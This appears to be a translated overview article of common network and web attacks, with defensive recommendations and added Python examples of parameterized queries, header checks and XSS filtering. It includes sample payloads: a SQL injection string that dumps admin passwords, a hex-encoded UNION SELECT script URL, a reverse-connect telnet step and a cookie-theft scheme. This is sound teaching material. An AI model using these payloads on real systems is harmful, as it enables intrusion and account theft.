Common Security Threats
Everyone probably knows that there are many different ways to threaten security. There really are a lot of them; how many, you will learn by reading on under the cut.
All links used below are given only as examples, even if they lead to the wrong place.
Fishing (or Phishing).
Social engineering
Viruses.
DoS (Denial of Service).
Flood (Flooding)
Smurf (attack aimed at TCP-IP protocol implementation errors)
Ping-of-Death (or Jolt, SSPing)
UDP Storm
UDP Bomb
Land
Mail Bombing
Sniffing
IP Hijack
Dummy ARP (False ARP)
Dummy DNS Server (False DNS Server)
Fuzzy
Puke
IP-Spoofing (Spoofing or IP Substitution)
Password guessing.
Back Connect / Pipes / Reverse
Software vulnerabilities
Buffer Overflow
Shatter
Nuke (WinNuke or Nuke)
Cross User Attack
SQL Injection
HRS (HTTP Resource Splitting)
Cross User Defacement
Web cache poisoning
Hijacking pages
CSS / XSS (Cross-Site Scripting)
SiXSS (SQL Injection Cross Site Scripting)
SiHRS (SQL Injection HTTP Resource Splitting)
The article is also available at: forxakep.ucoz.ru/publ/3-1-0-16
forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116
www.inattack.ru/article/402.html
Fishing (or Phishing).
A very broad concept. Its aim is to get information (passwords, credit card numbers, etc.) or money from users. The technique is aimed not at one user but at many. For example, letters allegedly from a technical support service are sent to all known customers of a bank. The letters usually contain a request to send the account password, allegedly because of some technical work. Despite the fact that users are warned that no employee may demand such information from them and that it should not be disclosed, there are always those who happily hand over their numbers, passwords, etc. Such letters are usually very believable and well composed, which can win over gullible users. It should be noted that there are several phishing methods besides letters. Some of the techniques below, when used correctly, are suitable for phishing (as a rule, we mention this in the description of the technique).
Recommendations: remember that paranoia is the best defense. Do not trust anything suspicious and do not share your data with anyone. Administrators do not need to know your password if it is meant for access to their server: they fully control the server and can see the password themselves or change it.
Social engineering
Not a technical but a psychological technique. Using the data gathered during reconnaissance, the cracker can call some user (of a corporate network, for example) on behalf of the administrator and try to find out, say, the password. This becomes possible in large networks, where users do not know all the employees and cannot always reliably recognize them by phone. In addition, elaborate psychological techniques are used, so the chance of success increases greatly.
Recommendations: the same as above. If there really is a need, provide the required data in person. If you have written the password down on paper, do not leave it anywhere and, if possible, destroy it rather than just throwing it in the trash.
Viruses.
The problem best known to the ordinary user. The bottom line is the introduction of malware onto the user's computer. The consequences vary and depend on the type of virus the computer is infected with, but in general they range from stealing information to sending spam, taking part in DDoS attacks, and gaining full control over the computer. Besides a file attached to a letter, viruses can get onto the computer through OS vulnerabilities, which are described in our article “Windows Vulnerability Rating”. There are many viruses, but they can still be classified. We do not want to reinvent the wheel, so you can use the information on this page, school8.uriit.ru/people/av/class.html, where a classification of viruses with descriptions is given. The topic is covered in more detail here: fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm
Recommendations: use antivirus software. Do not limit yourself to DrWEB or Kaspersky Anti-Virus alone (because they do not check the registry); also use specialized anti-malware tools, for example Ad-Aware, SpyBot, XSpy. Do not open suspicious attachments, and do not run programs from unknown senders at all. Even if the sender is familiar to you, check with the antivirus first. Here, as in medicine, prevention is easier than cure.
DoS (Denial of Service).
I would say that this is not so much a separate attack as the result of an attack; it is used to disable a system or individual programs. To do this, the cracker forms a request to a program in a special way, after which the program stops functioning. A reboot is required to return the program to working order. It is often believed that DoS is the same thing as a Flood attack and that all attacks leading to a system crash should be grouped under the general name DoS. It is worth mentioning that:
- There is no general terminology, only unspoken rules by which an attack is classified, so even within this article we give a somewhat loose classification.
- As we already said, not only Flood but also, for example, Buffer Overflow can lead to a denial of service.
Therefore, DoS is better described as the result of an attack. For example: “The denial of service effect is achieved by means of a Flood attack.”
Flood (Flooding)
This type is rather controversial: in part it can be attributed to DoS, but we would like to single it out. From a number of machines (in this case the attack is called DDoS, Distributed Denial of Service), as a rule zombies, the maximum possible number of requests (for example, connection requests) is sent to the victim. As a result the victim does not manage to respond to each request and therefore does not respond to user requests either, i.e. we can say that it ceases to function normally. Note: this type of attack can also be called hooliganism, when, for example, forums are filled with a large number of meaningless messages. The following Flood types can be distinguished:
--SYN Flood - flooding the attacked computer with SYN packets. As you know, a computer should respond to such a packet with a SYN/ACK packet. If there are too many SYN packets, the computer does not have time to respond to each one and cannot receive packets from other computers.
--ICMP Flood or Ping Flood - the same thing, only with ICMP packets. The system should respond to each such packet, creating a large number of packets that reduce the channel's performance (bandwidth).
--Identification Flood (Ident Flood) - similar to ICMP Flood, but responding to an identd request on port 113 takes the system longer, so the attack is more effective.
--DNS Flood - the attack is directed at a DNS server. It is flooded with DNS queries that it does not have time to answer, so it cannot answer your queries either. As a result, you cannot visit Internet sites.
--DDoS DNS - a fairly new attack for which we have not met a “well-established” name. In fact this technique is roughly the same as the previous one, the only difference being that requests come from a large number of machines (the previous type does not exclude this). The address to which the DNS server should send its responses is the address of the DNS server itself, i.e. it is not only inundated with DNS queries but also sends them to itself. Thus the technique is more effective than the previous one, but also harder to implement.
--Boink (Bonk, Teardrop) - a huge number of heavily fragmented packets with large fragments is sent to the victim. For each fragmented packet a special buffer is allocated in which the other fragments will later be placed so that they can be reassembled. A huge number of large fragments overflows the buffers and can cause a freeze or crash.
--Pong - the same as any of the types above, the only difference being that the sender address is fake. This gives the cracker some anonymity.
Recommendations: each OS or router has its own; they are usually given in the technical documentation. Do not neglect them, and clearly limit the number of permitted packets. Unfortunately, some variants cannot be repelled by anything other than physical disconnection. Properly configured firewalls are often a panacea.
Smurf (attack aimed at TCP-IP protocol implementation errors)
Now this type of attack is considered exotic, but earlier, when the TCP/IP protocol was fairly new, it contained a number of errors that allowed, for example, IP addresses to be spoofed. However, this type of attack is still in use. Some experts distinguish TCP Smurf, UDP Smurf and ICMP Smurf; of course, this division is based on the packet type.
Recommendations: CISCO switches, like many others, provide good protection, as do the latest software and firewalls; broadcast requests need to be blocked.
Ping-of-Death (or Jolt, SSPing)
The attack consists of sending the victim a fragmented ICMP packet whose fragment size is very large (64 kB). Older versions of the OS, such as Windows 95, hang. This attack can be carried out using the Shadow Security Scanner.
Recommendations: the easiest thing is to update the OS, abandoning the old version.
UDP Storm
It is used if at least two UDP ports are open on the victim, each of which sends a response to the sender. For example, port 37 (the time server) sends the current date and time in response to a request. The cracker sends a UDP packet to one of the victim's ports, but as the sender specifies the address of the victim and the victim's second open UDP port. The ports then begin to respond to each other endlessly, which reduces performance. The storm stops as soon as one of the packets is lost (for example, due to resource overload).
Recommendations: if possible, avoid services that accept UDP packets, or cut them off from the external network with a firewall.
UDP Bomb
The cracker sends the system a UDP packet with invalid service data fields. The data can be corrupted in any way (for example, an incorrect field length or structure). This can lead to a crash.
Recommendations: update the software.
Land
A packet is sent to the victim on a certain port, but the sender's address is set equal to the victim's and the sender's port equal to the recipient's port (example: receiver 1.1.1.1 port 111, sender 1.1.1.1 port 111). The victim tries to establish a connection with itself, which can cause the system to hang. A similar attack can also be 100% effective against some routers.
Mail Bombing
If the attacked computer hosts a mail server, a huge number of mail messages are sent to it in order to disable it. On the one hand this is reminiscent of Flood, but on the other, if the messages contain large attachments that are scanned by the server antivirus, scanning so many incoming attachments can significantly reduce performance or nullify it. In addition, such messages are stored on the server's hard disk and can fill it up, which can cause DoS. Of course, now this attack is more of a historical one, but in some cases it can still be used.
Recommendations: proper configuration of the mail server.
Sniffing
If hubs are installed instead of switches in the network, received packets are sent to all computers on the network, and each computer then determines whether the packet is for it or not. If the cracker gains access to a computer in such a network, or gains access to the network directly, all the information transmitted within the network segment, including passwords, becomes available to him. The cracker simply puts the network card into listening (promiscuous) mode and accepts all packets regardless of whether they were intended for him. Console sniffers can be used, for example TcpDump (built into *NIX systems) or WinDump (for Windows, not built in), as well as ones with a graphical interface, for example Iris.
Recommendations: use switches instead of hubs, encrypt traffic.
IP Hijack
If there is physical access to the network, the cracker can “cut into” the network cable and act as an intermediary in the transmission of packets, thereby listening to all traffic between the two computers. A very inconvenient method that often does not justify itself, except when no other method can be used. Such an insertion is inconvenient in itself, although there are devices that simplify the task a little, in particular by tracking packet numbering to avoid a failure and possible detection of the intrusion into the channel. This method is used to trick ATMs, but such a case is technically more difficult, because breaking the connection between the bank and the ATM is unacceptable, and “cutting into” the channel without breaking it is a task only for a highly qualified specialist. In addition, now ATMs are installed much better,
Recommendations: watch over access to cables, for example use cable boxes. Encrypt traffic.
Dummy ARP (False ARP)
An ARP server, router, or switch knows which IP addresses belong to which MAC addresses (i.e. network cards). If physical access to the network is possible, an attacker can fake an ARP response and pretend to be another computer on the network, taking over its IP. Thus all packets destined for that computer will be received by him. This is possible if that computer is turned off; otherwise the action will cause an IP address conflict (there cannot be two computers with the same IP address on one network).
Recommendations: use software that informs you about changes in the MAC address for an IP, and watch the ARP server log files.
Dummy DNS Server (False DNS Server)
If the network settings are set to automatic, then when connecting to the network the computer “asks” (i.e. sends a broadcast packet) who will be its DNS server, to which it will send DNS queries in the future. With physical access to the network, an attacker can intercept such a broadcast request and reply that his computer will be the DNS server. After that he can send the deceived victim along any route. For example, the victim wants to go to the bank's website and transfer money; the cracker can send him to his own computer, where the password entry form is fabricated, after which the password belongs to the cracker. This is a rather complicated method, because the attacker needs to respond to the victim earlier than the real DNS server.
Recommendations: if possible, restrict network access by strangers.
Fuzzy
Filters can be configured to block certain types of packets, such as UDP. An attacker can fabricate a packet so that the filter does not recognize it as a UDP packet and does not filter it, and it reaches its destination. In this way an attacker can bypass packet filters. This technique is very narrow and intended for special cases, namely those in which the connection does not have to be two-way. Two-way communication is impossible in most cases, because, as a rule, if incoming packets of a certain type are blocked on a port, outgoing packets are blocked as well. It turns out that even if the fabricated packet passes through the filter (for example, to a UDP port), the server will respond with a packet of the same type, i.e. UDP, but it will not fabricate it the way the cracker did. Thus this outgoing packet will be filtered out and will not reach the cracker.
Recommendations: usually newer versions of firewalls provide sufficient protection against this technique.
Puke
The cracker fabricates an ICMP unreachable response (remote system error), which provokes the client into disconnecting from the server. It is used more as an auxiliary tool, when some client must be disconnected from the server for an attack.
Fake unreachable - the cracker fabricates a message that the packet cannot be delivered (unreachable), making the server think that the client has failed and packets are not being delivered as intended. This may cause the server to disconnect the client. It is also an auxiliary tool, similar to Puke (No. 17), only aimed not at the client but at the server.
IP-Spoofing (Spoofing or IP Substitution)
The attacker replaces his real IP with a fictitious one. This is necessary if only certain IP addresses have access to a resource: the attacker needs to change his real IP to a “privileged” or “trusted” one in order to gain access. The method can also be used differently. After two computers have established a connection, checking passwords, the cracker can use specially generated packets to overload the victim's network resources. He can thereby redirect the traffic to himself and so bypass the authentication procedure.
Recommendations: there can be many of them, because there are many techniques. It is worth mentioning that the threat is reduced (although legitimate connections may be made harder) by shortening the wait time for a reply to a packet with the SYN and ACK flags set, and by increasing the maximum number of SYN requests in the connection queue (tcp_max_backlog). You can also use SYN cookies.
Host spoofing. A very sophisticated technique that requires physical access to the network. Each computer knows the router to which it sends all packets, which the router then delivers to the destination. When the router changes, a redirect notification is sent to each computer, after which the computers begin sending packets to the new router. An attacker can fabricate such a notification and impersonate a router, gaining control over the traffic within the network segment.
Recommendations: control over network access and over the moment the router is changed. For example, you can monitor whether all past traffic (i.e. old connections) has “appeared” on the new router.
Password guessing.
Used to log into a system by guessing an account password. There are two types: trying all possible character combinations (brute force) and dictionary guessing. The first method is more effective, because it will eventually hit the combination of characters you typed as your password, but it is extremely slow, especially if punctuation etc. is taken into account. The second method is fast, but if you chose a word that cannot be in the dictionary, for example “My-New-Password”, it cannot be found by a dictionary search. There are a lot of programs for guessing passwords, so we do not think it makes sense to name any specific ones. As a rule, programs, OSes, etc. store passwords in encrypted form, so even if an attacker gains access to the file, he will still have to decrypt the password.
Recommendations: use complex passwords, preferably with punctuation marks. Limit the number of password attempts. Against decryption of the password only its complexity will help.
Back Connect / Pipes / Reverse
This is an auxiliary technique, but in itself it is very interesting. For example, an attacker does not want to perform many actions every time for the sake of a single command. He can simplify the task with this technique. Its essence is that the cracker forces the attacked computer to connect to the cracker's computer. For example, on the attacked computer you can run the command telnet [ip.address] [port]. After that the cracker effectively receives a command line (a command shell) on the attacked computer.
Software vulnerabilities
Using bugs in software. The effect varies, from obtaining non-essential information to gaining full control over the system. Attacks through software bugs are the most popular at all times. Old bugs are fixed in new versions, but new versions bring new bugs that can be used in turn. Below we describe not types of attacks but the methods used to attack software errors. Recommendations: we give them right away for all of them, because the recommendation is general: only “safely” written program code will help. You can find a large amount of material on this topic on the Internet.
Buffer Overflow
A very dangerous type of attack, in which a request is formed in such a way that it overflows the memory allocated to it and the commands “sewn” into the request get onto the stack and are then executed by the processor. This can be done both remotely and locally, if the cracker can run his program on the attacked computer. It can be used both for executing code on a computer and for raising privileges. There are several types of buffer overflow attacks. We will not describe each of them, because to explain the principle we would have to give code examples that would be incomprehensible to people unfamiliar with programming. The classification below belongs to Andrey Kolishchak (andr [at] sandy.ru) and is taken from his article “Attacks on buffer overflow”, so you can find their description, examples and recommendations directly in that article.
--- Attack “failure of the stack” (stack smashing)
--- Attack “failure of the stack” with parameterization
--- Attack “failure of the stack” with control transfer
--- Distorting function pointers
--- Attack on function pointers
--- Attack on function pointers with parameterization
--- Attack on function pointers with control transfer
--- Attack on transition (jump) tables
--- Attack on transition tables with parameterization
--- Attack on transition tables with control transfer
--- Data pointer distortion
--- Attack with distortion of data pointers
--- Attack with distortion of data pointers with parameterization
--- Attack with distortion of data pointers with the original code.
We would like to add one more type to the above classification: Integer Overflow. For more information, see the articles “Integer Overflow: Attack” and “Integer Overflow: Protection”, or “Basic Integer Overflows” by Blexim.
Shatter
A vulnerability in Windows systems that can only be used locally. It is very similar to a buffer overflow, or rather leads to the same result: the cracker's commands land on the stack. It is based on the fact that every input field in a Windows window has a maximum length for the entered value. It is set at the development stage and for small fields may be, for example, 50. You cannot enter more than 50 characters from the keyboard, but Windows windows operate on messages. It is easy to obtain the handle (a special identifier intended only for the OS) of the input field and, using this handle, send it a SETTEXT (set text) message. The message says that a text longer than 50 characters must be set; accordingly, everything after the 50th character lands on the stack and is executed by the processor. There is no protection against this. The only panacea is AMD Athlon 64 processors, which have built-in protection and do not execute commands from the stack.
Nuke (WinNuke or Nuke)
Now this is more of a historical attack. By default Windows uses the NetBIOS protocol to share files and printers on the network. To do this, the OS opens three TCP ports (137, 138, 139). The implementation of this protocol in older versions of Windows contained a vulnerability: several OutOfBand “messages” sent in a row to open port 139 could not be processed correctly, and the system hung. A lot of programs have been written for such attacks, but we will only mention the Shadow Security Scanner, which we have already named as a tool for SSPing.
Cross User Attack
In our opinion a rather ambiguous name, because it does not reflect the essence of the attack very well, but nevertheless we stick to this well-known name. Squid 2.4 and ISA Server 2000 allow users to share TCP connections to a server. Using HRS (described below), two responses from the server can be triggered, one of which is controlled by the cracker and falsifies the information received by the user.
Attack on CGI. Most WWW (Web) servers use scripts to provide users with additional services or features, for example mail servers like mail.ru. Many servers have “self-written” CMS (Content Management Systems). Programmers do not always make their scripts check the values entered by the user, which makes it possible to use such oversights for various purposes. A buffer overflow attack can also be carried out through CGI script errors, for example: http://host/cgi-bin/helloworld?type=A*100 (i.e. the letter A repeated 100 times). At http://www.opennet.ru/base/sec/linux_sec_guide.txt.html you can find an excellent article, the second part of which describes security problems usually ignored by CGI programmers. Many of them are not hacking methods but only help hacking, so to write good code it is better to read that article. The scope of our article does not allow us to delve into writing safe code, so we only say that, at a minimum, you need to filter all service characters out of the received data.
SQL Injection
If data entered by the user is used in generated SQL queries without verification, the cracker can enter data that lets him get any information from your SQL databases. For example, there is the query “SELECT login, password FROM members WHERE email='$email';”, where $email is entered by the user in a form; the query is processed and the result is displayed on the page. An attacker can modify the data and enter into the form: “my@mail.ru' OR login LIKE '%admin%”. Thus the generated SQL query becomes: “SELECT login, password FROM members WHERE email='my@mail.ru' OR login LIKE '%admin%';”, and the cracker receives the passwords of all users whose login contains admin.
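The query above reproduced in Python against an in-memory SQLite table, as an added example that is not from the article; the table, its rows and the two lookup functions are constructed here for illustration, and the safe variant passes the input as a query parameter instead of pasting it into the SQL text:

```python
import sqlite3

# Constructed sample table: logins, passwords and e-mails are made up for
# the example (the article's query selects the password column as-is).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (login TEXT, password TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [
            ("alice", "alice-pass", "alice@example.com"),
            ("admin", "admin-pass", "admin@example.com"),
            ("bob", "bob-pass", "my@mail.ru"),
        ],
    )
    return conn

def lookup_vulnerable(conn, email):
    # The article's query: the user's input is spliced into the SQL text,
    # so a quote in the input closes the string and the rest becomes SQL.
    sql = "SELECT login, password FROM members WHERE email = '%s';" % email
    return conn.execute(sql).fetchall()

def lookup_safe(conn, email):
    # Parameterized query: the driver sends the value separately from the
    # statement, so quotes and keywords in it are data, never syntax.
    sql = "SELECT login, password FROM members WHERE email = ?;"
    return conn.execute(sql, (email,)).fetchall()

# The form input from the article (constructed, not a real account).
INJECTED = "my@mail.ru' OR login LIKE '%admin%"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, INJECTED))   # bob's row plus the admin row
    print(lookup_safe(db, INJECTED))         # no row has that literal e-mail
    print(lookup_safe(db, "my@mail.ru"))     # only bob's row
```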
HRS (HTTP Resource Splitting)
A fairly young and, in our opinion, complicated trick (unless it is used only for XSS), which allows attacks such as Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning and XSS (described below) to be carried out. The essence of the attack is that with a specially prepared HTTP request an attacker can force a Web server vulnerable to HRS to respond to the victim (not to the attacker) with two separate HTTP responses instead of the single one it would send in a normal situation. The first HTTP response is only partially controlled by the cracker, but the second is completely under his control! If possible, the cracker sends two requests for which the victim is already the intermediary. The first of these requests again causes the Web server to respond twice, and the second usually requests some secondary resource on the server (for example, a small picture). But the victim matches the second HTTP request (for the secondary resource) with the second HTTP response (the one controlled by the cracker)! Thus the victim believes that the resulting “aggregate” is the Web server's response with part of its content, but in fact it is important information or a command prepared by the cracker. There is one more nuance: the victim may be the attacker's own computer, which as a result of the attack receives important information, for example another user's cookie. Below we describe the attacks that can be carried out through HRS; they can also be carried out by other tricks, but we describe them all in the context of HRS.
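How a single unchecked header value turns one response into two, as an added example that is not from the article: a redirect builder in the style of a CGI script that copies a user-supplied URL into the Location header, a simplified response parser that walks the byte stream the way a client or proxy would, and the header-value check that closes the hole. All names and the sample redirect target are constructed for illustration.

```python
import re

def build_redirect_vulnerable(target):
    # Header value copied verbatim: a line break inside it ends the Location
    # line early, and whatever follows is read as further headers or as a
    # second message.
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n\r\n")

def is_safe_header_value(value):
    # A header value can never legitimately contain CR, LF or other control
    # characters; reject rather than try to "clean" the value.
    return re.search(r"[\x00-\x1f\x7f]", value) is None

def build_redirect_safe(target):
    if not is_safe_header_value(target):
        raise ValueError("line break or control character in header value")
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n\r\n")

def parse_responses(raw):
    """Return the status line of every HTTP response found in raw, reading
    message by message and honouring Content-Length (simplified parser for
    the example: no chunked encoding, text input)."""
    statuses = []
    pos = 0
    while True:
        while raw.startswith("\r\n", pos):      # tolerate blank lines between messages
            pos += 2
        head_end = raw.find("\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].split("\r\n")
        if not lines[0].startswith("HTTP/"):   # trailing fragment, not a message
            break
        statuses.append(lines[0])
        body_len = 0
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                body_len = int(value.strip())
        pos = head_end + 4 + body_len
    return statuses

# Constructed redirect target that carries a line break followed by a complete
# second response; a client would pair that second response with its next
# request, which is the "aggregate" the article describes.
SPLIT_TARGET = ("http://host/\r\nContent-Length: 0\r\n\r\n"
                "HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")

if __name__ == "__main__":
    print(parse_responses(build_redirect_vulnerable(SPLIT_TARGET)))   # two status lines
    print(parse_responses(build_redirect_vulnerable("http://host/")))  # one status line
    print(is_safe_header_value(SPLIT_TARGET))                           # False
```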
Cross User Defacement
A fairly “narrow” method, because the attacker fakes a page that the vulnerable Web server sends to only one victim; the contents of the Web server itself do not change in any way. The technique is very difficult to carry out without HRS: the cracker would have to act as an intermediary between the client and the server using Spoofing, IP Hijack, or errors in the implementation of some Web servers, but in the end the “costs” would not justify the result. It is easier to implement it through a cross-user attack.
Web cache poisoning
In my opinion this is not a very useful technique, so I will describe it very briefly. Proxy servers cache the pages requested by users so that, on a repeated request for such a page, they return it from the cache rather than asking the Web server. This saves traffic, for example on a corporate network with an intranet proxy server. The essence of the technique is to provoke the proxy server into caching a fake page, which is then served to network users.
Browser Cache Poisoning. Not only proxy servers have caches; browsers do too. In essence this technique is almost the same as Web Cache Poisoning, the only difference being that only one computer is affected.
Hijacking pages
To some extent, this technique is similar to an inter-user attack, but here the goal of the attack is not to "forge" the user forged information, such as a Web page, but rather, to make the server forward the Web page that was intended to another user to the attacker. In this way, an attacker can obtain important information intended for another user. This can be his account number or the password given to him. To conduct an attack, an attacker needs a TCP connection with a proxy server (let's call it “VSP”), a TCP connection between the victim and a proxy server (“ZhSP”) and a TCP connection between the Web server and the proxy server (“SSP”). The scheme is as follows:
--- The cracker sends a request (let's call it "ZA") to the proxy server through "VSP"; the web server will answer it with two "responses", "OF1" and "OF2" (the HRS case).
--- The proxy server sends "ZA" to the web server through "SSP".
--- The web server responds with "OF1" and "OF2" through "SSP".
--- The proxy server takes "OF1" as the response to "ZA" and sends it to the cracker through "VSP".
--- The victim sends a request "ZZh" to the proxy server through "ZhSP"; the web server should answer it with the page "OS", which contains the important information.
--- The proxy server sends "ZZh" to the web server through "SSP", but immediately takes the fake "OF2" as the web server's response.
--- The proxy server sends "OF2" to the victim through "ZhSP" as the response to "ZZh".
--- The cracker sends a new request "ZA2" to the proxy server through "VSP".
--- Meanwhile the proxy server receives the web server's response to "ZZh" through "SSP".
--- The proxy server still sends "ZA2" to the web server through "SSP", but then takes "OS" as the response to "ZA2".
--- The proxy server sends "OS" to the cracker through "VSP". Thus the cracker has achieved his goal: he received a page that was intended for the victim.
After that the proxy server will receive the response to the cracker's last request, but by then there is no one to hand this page to, and it will most likely be discarded. We think that after considering this scheme it is clear that the attack is not as hard to implement in theory as it is in practice: it requires precisely planned timing of when requests are sent and, accordingly, accurate knowledge of when the responses to those requests will arrive.
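The sequence above, replayed as a small simulation. This is an added example, not code from the original article; the connection and message labels are the ones used above, the web server and proxy are constructed stand-ins, and the "hardened" behaviour is an assumed mitigation rather than anything the article describes.

```python
"""Added example (not code from the original article): the page-hijacking
sequence above as a simulation. A proxy pairs responses to requests in order
over one shared upstream connection; when one request makes the web server
emit two responses (the HRS case), every later pairing is off by one. The
'hardened' mode is an assumed mitigation: bytes already waiting upstream
before a request is sent mean desynchronisation, so they are discarded."""

def http_response(body: str) -> bytes:
    """Minimal HTTP/1.1 response with an exact Content-Length."""
    return f"HTTP/1.1 200 OK\r\nContent-Length: {len(body)}\r\n\r\n{body}".encode()

class WebServer:
    """Constructed back end: 'ZA' is the cracker's crafted request, which the
    server answers with two responses glued together (OF1 + OF2)."""
    def handle(self, request: str) -> bytes:
        if request == "ZA":
            return http_response("OF1") + http_response("OF2")
        if request == "ZZh":
            return http_response("OS")  # the victim's page with the secret
        return http_response("page for " + request)

class Proxy:
    def __init__(self, server: WebServer, hardened: bool = False):
        self.server, self.hardened = server, hardened
        self.upstream = b""  # bytes from the web server not yet consumed
    def _read_one_response(self) -> str:
        # Consume exactly one response: status line, headers, Content-Length body.
        head, _, rest = self.upstream.partition(b"\r\n\r\n")
        length = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        body, self.upstream = rest[:length], rest[length:]
        return body.decode()
    def forward(self, request: str) -> str:
        if self.hardened and self.upstream:
            self.upstream = b""  # unsolicited data on an idle connection: drop it
        self.upstream += self.server.handle(request)  # send request, read reply
        return self._read_one_response()

def run_sequence(hardened: bool) -> dict:
    """Replay ZA, ZZh, ZA2 and report which body each party received."""
    proxy = Proxy(WebServer(), hardened)
    return {
        "cracker_1": proxy.forward("ZA"),   # OF1 either way
        "victim": proxy.forward("ZZh"),     # OF2 when vulnerable, OS when hardened
        "cracker_2": proxy.forward("ZA2"),  # OS (the victim's page) when vulnerable
    }
```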
CSS / XSS (Cross-Site Scripting or Cross-Site Scripting)
The attack, which Microsoft never recognized as dangerous, is based on the use of JavaScript in a page. As you know, JavaScript code "sewn" into a page is executed by the user's browser. Its possibilities are quite limited, but in the right hands the available opportunities can be used very effectively. For example, many forums or mail servers identify a user by the presence of a certain cookie on the user's computer. It is unique for everyone, and therefore it is considered safe enough to identify the user for access to information of low importance by its presence alone, without entering a password. But a cookie can be stolen! An attacker can inject code like: "" into the page and create a snf.jpg file on his website which is actually a script and writes the data received through document.cookie to a file. Thus every user who visits the forum page where the cracker has embedded the above code (for example, in place of a picture) will "present" his cookie to the cracker, who can later use it to log in to the forum. Even if external links to images are not allowed but uploading them is possible, a filter on the extension alone (so that it is, for example, JPG) is not enough: the attack will still succeed if the JavaScript code is contained in the file body (for example, of "photo.jpg"). If the server is susceptible to an XSS attack, the client can protect itself by disabling the execution of JavaScript in the browser. Of course, after this some pages may not work correctly.
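Server-side checks for the forum scenario above, as an added example that is not code from the original article. The file names, the session cookie layout and the sample uploads are constructed for the example.

```python
"""Two server-side checks for the forum scenario above. Added example, not
code from the original article. Filtering on the file extension alone is not
enough, so an upload claiming to be a JPEG is also checked against the JPEG
signature; user-supplied text is escaped before it is embedded in a page so a
script tag is shown as text rather than executed; and the session cookie is
issued with HttpOnly so document.cookie cannot read it even if a script runs."""
import html
import os

JPEG_SOI = b"\xff\xd8\xff"  # every JPEG file starts with this marker


def is_real_jpeg(filename: str, data: bytes) -> bool:
    """Accept an upload only if both the extension and the file body say JPEG."""
    if os.path.splitext(filename)[1].lower() not in (".jpg", ".jpeg"):
        return False
    return data.startswith(JPEG_SOI)


def render_post(author: str, text: str) -> str:
    """Embed untrusted text in HTML with every special character escaped."""
    return f'<div class="post"><b>{html.escape(author)}</b>: {html.escape(text)}</div>'


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line: not readable from JavaScript, sent over HTTPS only."""
    return f"Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


# Constructed inputs: a genuine JPEG header and a 'photo.jpg' whose body is script.
REAL_PHOTO = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
FAKE_PHOTO = b"<script>alert(1)</script>"
```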
SiXSS (SQL Injection Cross Site Scripting)
It is a combination of SQL Injection and XSS, i.e. executing an XSS attack through a script's SQL Injection vulnerability. The attack is based on the fact that recent versions of MySQL can translate hexadecimal values (of the form 0xXX) into text. For example, through an SQL query you can find out that the hexadecimal value of a short script tag that pops up a window with the text "SiXSS" is "3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E". Now, if there is a script vulnerable to SQL Injection, you can make this request: www.victim.com/vuln_script.php?vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E. We hope it is clear that vuln_variable and vuln_script stand for a vulnerable variable and a vulnerable script respectively. As a result we get a window with the text SiXSS, which means that the attack was successful. The code is completely harmless, so you can check it yourself. Such an attack is very specific, so we consider it necessary to discuss it in more detail. Unlike XSS, this attack, in a modified form, is used in phishing. It is rather difficult to embed such code in someone else's page, because "working" scripts in their hexadecimal form are very long and may exceed the permitted length, so it is easier to send such a link separately as text than to "sew" it into a page. Of course, many users will say that they would never open a link if they saw SQL query elements such as "UNION" in it; however, there is a pitfall: it is easy to hide the link from the human eye and make it unrecognizable. For example, the entry %F1%F1%FB%EB%EA%E0 is completely incomprehensible to the eye, but will be correctly interpreted by the browser and the server. There are also several other ways to mask a link, so it is easy to be fooled. In addition, many email clients prefer not to show the entire link but only its beginning, so SQL fragments can simply be hidden. Therefore, either do not trust unknown senders, even if they introduce themselves as bank managers, or turn off JavaScript. The first option is still preferable. From personal experience it can be said that once a similar letter came from a "bank manager", where the "sender" field read "Apex Bank PLC", but the return address was apexbnkplcc@yahoo.co.uk. It is clear that he was a scammer, because a bank would never entrust the processing of its mail to free mail servers. Carefully check the return address and do not believe in easy money!
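A link inspector for the case above, as an added example that is not code from the original article: it decodes the link the way the browser and server would, so that a hex literal hiding a script tag becomes visible to a mail or proxy filter. The marker list and the helper names are assumptions of the example; the sample link is the one quoted above.

```python
"""Link inspection for the SiXSS case above. Added example, not code from
the original article. A script tag can travel inside a UNION SELECT as a
MySQL hex literal (0x...), so the word 'script' never appears in the link,
and the rest of the link may be percent-encoded. This decodes the query
string and every hex literal in it and reports what the browser and server
would actually be handed, which is what a mail or proxy filter should check."""
import re
from urllib.parse import parse_qsl, urlsplit

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
SUSPICIOUS = ("<script", "union", "select", "onerror=", "javascript:")


def decode_hex_literals(value: str) -> list:
    """Turn every even-length 0x... token in a parameter value into text."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_LITERAL.findall(value) if len(h) % 2 == 0]


def inspect_link(url: str, encoding: str = "utf-8") -> dict:
    """Decoded parameters, hex payloads found, and whether they look hostile.
    Pass encoding='cp1251' for links percent-encoded the way %F1%F1%FB... is."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True, encoding=encoding)
    findings = {"params": {}, "payloads": [], "suspicious": False}
    for name, value in params:
        findings["params"][name] = value
        decoded = decode_hex_literals(value)
        findings["payloads"].extend(decoded)
        text = (value + " " + " ".join(decoded)).lower()
        if any(marker in text for marker in SUSPICIOUS):
            findings["suspicious"] = True
    return findings


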